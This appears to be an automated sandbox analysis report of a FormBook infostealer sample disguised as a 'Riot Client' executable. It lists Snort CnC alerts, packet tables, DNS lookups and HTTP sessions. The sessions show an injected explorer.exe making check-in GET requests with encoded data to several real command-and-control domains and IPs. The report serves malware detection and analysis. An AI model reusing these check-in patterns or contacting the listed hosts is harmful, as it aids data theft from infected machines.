                                                        RT_MANIFEST0xb04280x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0000 0x04b0
                                                        LegalCopyright(c) 2019 Riot Games, Inc.
                                                        Assembly Version2.0.26.9
                                                        InternalNameFixedBufferAttribu.exe
                                                        FileVersion2.0.26.9
                                                        CompanyNameRiot Games, Inc.
                                                        LegalTrademarks
                                                        Comments
                                                        ProductNameRiot Client
                                                        ProductVersion2.0.26.9
                                                        FileDescriptionRiot Client
                                                        OriginalFilenameFixedBufferAttribu.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        07/22/21-13:15:39.181869TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.4199.34.228.66
                                                        07/22/21-13:15:39.181869TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.4199.34.228.66
                                                        07/22/21-13:15:39.181869TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.4199.34.228.66
                                                        07/22/21-13:15:50.171392TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.4104.143.9.211
                                                        07/22/21-13:15:50.171392TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.4104.143.9.211
                                                        07/22/21-13:15:50.171392TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.4104.143.9.211

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jul 22, 2021 13:15:27.243021965 CEST4976380192.168.2.4156.241.53.21
                                                        Jul 22, 2021 13:15:27.482089996 CEST8049763156.241.53.21192.168.2.4
                                                        Jul 22, 2021 13:15:27.482280970 CEST4976380192.168.2.4156.241.53.21
                                                        Jul 22, 2021 13:15:27.482441902 CEST4976380192.168.2.4156.241.53.21
                                                        Jul 22, 2021 13:15:27.721946001 CEST8049763156.241.53.21192.168.2.4
                                                        Jul 22, 2021 13:15:27.991508961 CEST4976380192.168.2.4156.241.53.21
                                                        Jul 22, 2021 13:15:28.273083925 CEST8049763156.241.53.21192.168.2.4
                                                        Jul 22, 2021 13:15:33.075309992 CEST4976680192.168.2.4156.241.53.248
                                                        Jul 22, 2021 13:15:33.302040100 CEST8049766156.241.53.248192.168.2.4
                                                        Jul 22, 2021 13:15:33.302129984 CEST4976680192.168.2.4156.241.53.248
                                                        Jul 22, 2021 13:15:33.302323103 CEST4976680192.168.2.4156.241.53.248
                                                        Jul 22, 2021 13:15:33.528909922 CEST8049766156.241.53.248192.168.2.4
                                                        Jul 22, 2021 13:15:33.804502964 CEST4976680192.168.2.4156.241.53.248
                                                        Jul 22, 2021 13:15:34.072108030 CEST8049766156.241.53.248192.168.2.4
                                                        Jul 22, 2021 13:15:34.220505953 CEST8049766156.241.53.248192.168.2.4
                                                        Jul 22, 2021 13:15:34.220570087 CEST8049766156.241.53.248192.168.2.4
                                                        Jul 22, 2021 13:15:34.220638037 CEST4976680192.168.2.4156.241.53.248
                                                        Jul 22, 2021 13:15:34.220674038 CEST4976680192.168.2.4156.241.53.248
                                                        Jul 22, 2021 13:15:38.997890949 CEST4976780192.168.2.4199.34.228.66
                                                        Jul 22, 2021 13:15:39.181548119 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.181768894 CEST4976780192.168.2.4199.34.228.66
                                                        Jul 22, 2021 13:15:39.181869030 CEST4976780192.168.2.4199.34.228.66
                                                        Jul 22, 2021 13:15:39.365695000 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.378952026 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.379004002 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.379040956 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.379069090 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.379138947 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.379391909 CEST4976780192.168.2.4199.34.228.66
                                                        Jul 22, 2021 13:15:39.379453897 CEST4976780192.168.2.4199.34.228.66
                                                        Jul 22, 2021 13:15:39.379527092 CEST4976780192.168.2.4199.34.228.66
                                                        Jul 22, 2021 13:15:44.485562086 CEST4976880192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:15:44.675643921 CEST8049768184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:15:44.675847054 CEST4976880192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:15:44.676069021 CEST4976880192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:15:44.865772963 CEST8049768184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:15:44.885785103 CEST8049768184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:15:44.885847092 CEST8049768184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:15:44.886029959 CEST4976880192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:15:44.886105061 CEST4976880192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:15:45.075747967 CEST8049768184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:15:47.860467911 CEST8049763156.241.53.21192.168.2.4
                                                        Jul 22, 2021 13:15:47.860491037 CEST8049763156.241.53.21192.168.2.4
                                                        Jul 22, 2021 13:15:47.860761881 CEST4976380192.168.2.4156.241.53.21
                                                        Jul 22, 2021 13:15:47.860922098 CEST4976380192.168.2.4156.241.53.21
                                                        Jul 22, 2021 13:15:50.048429966 CEST4976980192.168.2.4104.143.9.211
                                                        Jul 22, 2021 13:15:50.171098948 CEST8049769104.143.9.211192.168.2.4
                                                        Jul 22, 2021 13:15:50.171222925 CEST4976980192.168.2.4104.143.9.211
                                                        Jul 22, 2021 13:15:50.171391964 CEST4976980192.168.2.4104.143.9.211
                                                        Jul 22, 2021 13:15:50.294097900 CEST8049769104.143.9.211192.168.2.4
                                                        Jul 22, 2021 13:15:50.310985088 CEST8049769104.143.9.211192.168.2.4
                                                        Jul 22, 2021 13:15:50.311011076 CEST8049769104.143.9.211192.168.2.4
                                                        Jul 22, 2021 13:15:50.314615011 CEST4976980192.168.2.4104.143.9.211
                                                        Jul 22, 2021 13:15:50.315505981 CEST4976980192.168.2.4104.143.9.211
                                                        Jul 22, 2021 13:15:50.442882061 CEST8049769104.143.9.211192.168.2.4
                                                        Jul 22, 2021 13:15:55.430165052 CEST4977080192.168.2.446.137.146.55
                                                        Jul 22, 2021 13:15:55.498688936 CEST804977046.137.146.55192.168.2.4
                                                        Jul 22, 2021 13:15:55.498841047 CEST4977080192.168.2.446.137.146.55
                                                        Jul 22, 2021 13:15:55.499026060 CEST4977080192.168.2.446.137.146.55
                                                        Jul 22, 2021 13:15:55.567529917 CEST804977046.137.146.55192.168.2.4
                                                        Jul 22, 2021 13:15:55.577905893 CEST804977046.137.146.55192.168.2.4
                                                        Jul 22, 2021 13:15:55.578178883 CEST804977046.137.146.55192.168.2.4
                                                        Jul 22, 2021 13:15:55.578355074 CEST4977080192.168.2.446.137.146.55
                                                        Jul 22, 2021 13:15:55.578644037 CEST4977080192.168.2.446.137.146.55
                                                        Jul 22, 2021 13:15:55.647133112 CEST804977046.137.146.55192.168.2.4
                                                        Jul 22, 2021 13:16:00.654165983 CEST4977180192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:16:00.847254038 CEST8049771184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:16:00.847501993 CEST4977180192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:16:00.847594023 CEST4977180192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:16:01.042227983 CEST8049771184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:16:01.085139990 CEST8049771184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:16:01.085175991 CEST8049771184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:16:01.085448980 CEST4977180192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:16:01.085550070 CEST4977180192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:16:01.278965950 CEST8049771184.168.131.241192.168.2.4

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jul 22, 2021 13:13:49.394126892 CEST5453153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:49.454266071 CEST53545318.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:50.166775942 CEST4971453192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:50.255718946 CEST53497148.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:51.725023031 CEST5802853192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:51.777916908 CEST53580288.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:53.322088003 CEST5309753192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:53.379755974 CEST53530978.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:54.434233904 CEST4925753192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:54.483282089 CEST53492578.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:55.674511909 CEST6238953192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:55.724756956 CEST53623898.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:57.345643044 CEST4991053192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:57.398070097 CEST53499108.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:59.108213902 CEST5585453192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:59.167979956 CEST53558548.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:00.366065025 CEST6454953192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:00.418442965 CEST53645498.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:01.644599915 CEST6315353192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:01.697521925 CEST53631538.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:02.827272892 CEST5299153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:02.879297972 CEST53529918.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:04.225826025 CEST5370053192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:04.275085926 CEST53537008.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:05.790174007 CEST5172653192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:05.842089891 CEST53517268.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:07.014611006 CEST5679453192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:07.064395905 CEST53567948.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:07.971545935 CEST5653453192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:08.039866924 CEST53565348.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:10.682776928 CEST5662753192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:10.734731913 CEST53566278.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:14.528445959 CEST5662153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:14.577896118 CEST53566218.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:18.710480928 CEST6311653192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:18.759555101 CEST53631168.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:18.910850048 CEST6407853192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:18.984868050 CEST53640788.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:20.194933891 CEST6480153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:20.247428894 CEST53648018.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:42.673732042 CEST6172153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:42.730659008 CEST53617218.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:43.360750914 CEST5125553192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:43.465878010 CEST53512558.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:44.152862072 CEST6152253192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:44.282011032 CEST53615228.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:45.132668972 CEST5233753192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:45.191127062 CEST53523378.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:45.219687939 CEST5504653192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:45.277264118 CEST53550468.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:45.806031942 CEST4961253192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:45.862972975 CEST53496128.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:47.597892046 CEST4928553192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:47.658058882 CEST53492858.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:48.231107950 CEST5060153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:48.282330036 CEST53506018.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:48.845844984 CEST6087553192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:48.898147106 CEST53608758.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:49.913254023 CEST5644853192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:49.973439932 CEST53564488.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:50.913597107 CEST5917253192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:50.966593981 CEST53591728.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:51.733690023 CEST6242053192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:51.786133051 CEST53624208.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:55.605300903 CEST6057953192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:55.665595055 CEST53605798.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:27.176110983 CEST5018353192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:27.237327099 CEST53501838.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:27.254256010 CEST6153153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:27.321616888 CEST53615318.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:29.288182974 CEST4922853192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:29.353451967 CEST53492288.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:33.012599945 CEST5979453192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:33.074120998 CEST53597948.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:38.825973034 CEST5591653192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:38.996172905 CEST53559168.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:44.418431997 CEST5275253192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:44.483258009 CEST53527528.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:49.904895067 CEST6054253192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:50.046713114 CEST53605428.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:15:55.338299036 CEST6068953192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:15:55.428956985 CEST53606898.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:16:00.590152979 CEST6420653192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:16:00.653287888 CEST53642068.8.8.8192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        Jul 22, 2021 13:15:27.176110983 CEST192.168.2.48.8.8.80x121fStandard query (0)www.boicity.comA (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:33.012599945 CEST192.168.2.48.8.8.80x1ca7Standard query (0)www.sh-zzjy.comA (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:38.825973034 CEST192.168.2.48.8.8.80x73fStandard query (0)www.zrcezzfdfkyjlir.comA (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:44.418431997 CEST192.168.2.48.8.8.80x641aStandard query (0)www.iafzal.comA (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:49.904895067 CEST192.168.2.48.8.8.80x90feStandard query (0)www.nirvananaturalcbd.netA (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.338299036 CEST192.168.2.48.8.8.80x666dStandard query (0)www.updates-app.comA (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:16:00.590152979 CEST192.168.2.48.8.8.80x299cStandard query (0)www.fbgroupsmadesimple.comA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        Jul 22, 2021 13:15:27.237327099 CEST8.8.8.8192.168.2.40x121fNo error (0)www.boicity.com156.241.53.21A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:33.074120998 CEST8.8.8.8192.168.2.40x1ca7No error (0)www.sh-zzjy.com156.241.53.248A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:38.996172905 CEST8.8.8.8192.168.2.40x73fNo error (0)www.zrcezzfdfkyjlir.com199.34.228.66A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:44.483258009 CEST8.8.8.8192.168.2.40x641aNo error (0)www.iafzal.comiafzal.comCNAME (Canonical name)IN (0x0001)
                                                        Jul 22, 2021 13:15:44.483258009 CEST8.8.8.8192.168.2.40x641aNo error (0)iafzal.com184.168.131.241A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:50.046713114 CEST8.8.8.8192.168.2.40x90feNo error (0)www.nirvananaturalcbd.net104.143.9.211A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:50.046713114 CEST8.8.8.8192.168.2.40x90feNo error (0)www.nirvananaturalcbd.net104.143.9.210A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)www.updates-app.comround-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.comCNAME (Canonical name)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com46.137.146.55A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com18.203.219.9A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com34.255.33.146A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com54.155.1.52A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com34.251.97.14A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com52.212.183.103A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com34.246.78.149A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:15:55.428956985 CEST8.8.8.8192.168.2.40x666dNo error (0)round-peacock-r52qmr18tj1ljgerw1dev1ae.herokudns.com34.242.133.169A (IP address)IN (0x0001)
                                                        Jul 22, 2021 13:16:00.653287888 CEST8.8.8.8192.168.2.40x299cNo error (0)www.fbgroupsmadesimple.comfbgroupsmadesimple.comCNAME (Canonical name)IN (0x0001)
                                                        Jul 22, 2021 13:16:00.653287888 CEST8.8.8.8192.168.2.40x299cNo error (0)fbgroupsmadesimple.com184.168.131.241A (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • www.boicity.com
                                                        • www.sh-zzjy.com
                                                        • www.zrcezzfdfkyjlir.com
                                                        • www.iafzal.com
                                                        • www.nirvananaturalcbd.net
                                                        • www.updates-app.com
                                                        • www.fbgroupsmadesimple.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.449763156.241.53.2180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:15:27.482441902 CEST6096OUTGET /4nn8/?Hdydvr=K/+E+I2IaBFJ5+Cq3Rel2nBITE/CM1NIkmEUWNpd048Z4hITxZXmdbK/fpJNWxfegP81&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.boicity.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:15:47.860467911 CEST6118INHTTP/1.1 200 OK
                                                        Date: Thu, 22 Jul 2021 11:15:27 GMT
                                                        Server: Apache
                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Pragma: no-cache
                                                        Connection: close
                                                        Set-Cookie: PHPSESSID=oii5c43eppespmfquijqnko7b4; path=/
                                                        Upgrade: h2
                                                        Connection: Upgrade
                                                        Content-Length: 0
                                                        Content-Type: text/html; charset=gbk


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.449766156.241.53.24880C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:15:33.302323103 CEST6110OUTGET /4nn8/?Hdydvr=i0XGe6lKRF+5hxK276Prns6Op/qjCtWP9PfxQZZGRBq4WhJG8zoVsATrcXi5v9ulo8Wv&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.sh-zzjy.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:15:34.220505953 CEST6111INHTTP/1.1 302 Moved Temporarily
                                                        Date: Thu, 22 Jul 2021 11:15:33 GMT
                                                        Server: Apache
                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Pragma: no-cache
                                                        Set-Cookie: PHPSESSID=h4aj6vnqf4735he6qq4lbomgl0; path=/
                                                        Upgrade: h2
                                                        Connection: Upgrade, close
                                                        Location: /
                                                        Content-Length: 0
                                                        Content-Type: text/html; charset=gbk


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.449767199.34.228.6680C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:15:39.181869030 CEST6112OUTGET /4nn8/?Hdydvr=DlDj4b1enWmfAZKfxgQAJvc2gBRdZlUrx2lzN81LRJr5fJ6P75G3daxk/kXjeAeayVM3&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.zrcezzfdfkyjlir.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:15:39.378952026 CEST6113INHTTP/1.1 404 Not Found
                                                        Date: Thu, 22 Jul 2021 11:15:39 GMT
                                                        Server: Apache
                                                        Set-Cookie: is_mobile=0; path=/; domain=www.zrcezzfdfkyjlir.com
                                                        Vary: X-W-SSL,User-Agent
                                                        Set-Cookie: language=en; expires=Thu, 05-Aug-2021 11:15:39 GMT; Max-Age=1209600; path=/
                                                        Cache-Control: private
                                                        X-Host: pages3.sf2p.intern.weebly.net
                                                        X-UA-Compatible: IE=edge,chrome=1
                                                        Content-Length: 3802
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 67 64 70 72 2f 67 64 70 72 73 63 72 69 70 74 2e 6a 73 3f 62 75 69 6c 64 54 69 6d 65 3d 31 36 32 36 34 35 31 37 34 35 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 63 64 6e 31 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 64 65 76 65 6c 6f 70 65 72 2f 6e 6f 6e 65 2e 69 63 6f 22 20 2f 3e 0a 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 2c 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head><script src="/gdpr/gdprscript.js?buildTime=1626451745"></script><title>404 - Page Not Found</title><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="robots" content="noarchive" /><link rel="shortcut icon" href="//cdn1.editmysite.com/developer/none.ico" /><style type="text/css">@font-face {font-family: 'Proxima Nova';font-weight: 300;src: url("//cdn2.editmysite.com/components/ui-framework/fonts/proxima-nova-light/31AC96_0_0.eot");src: url("//cdn2.editmysite.com/components/ui-framework/fonts/proxima-nova-light/31AC96_0_0.eot?#iefix") format("embedded-opentype"), url("//cdn2.editmysite.com/components/ui-framew
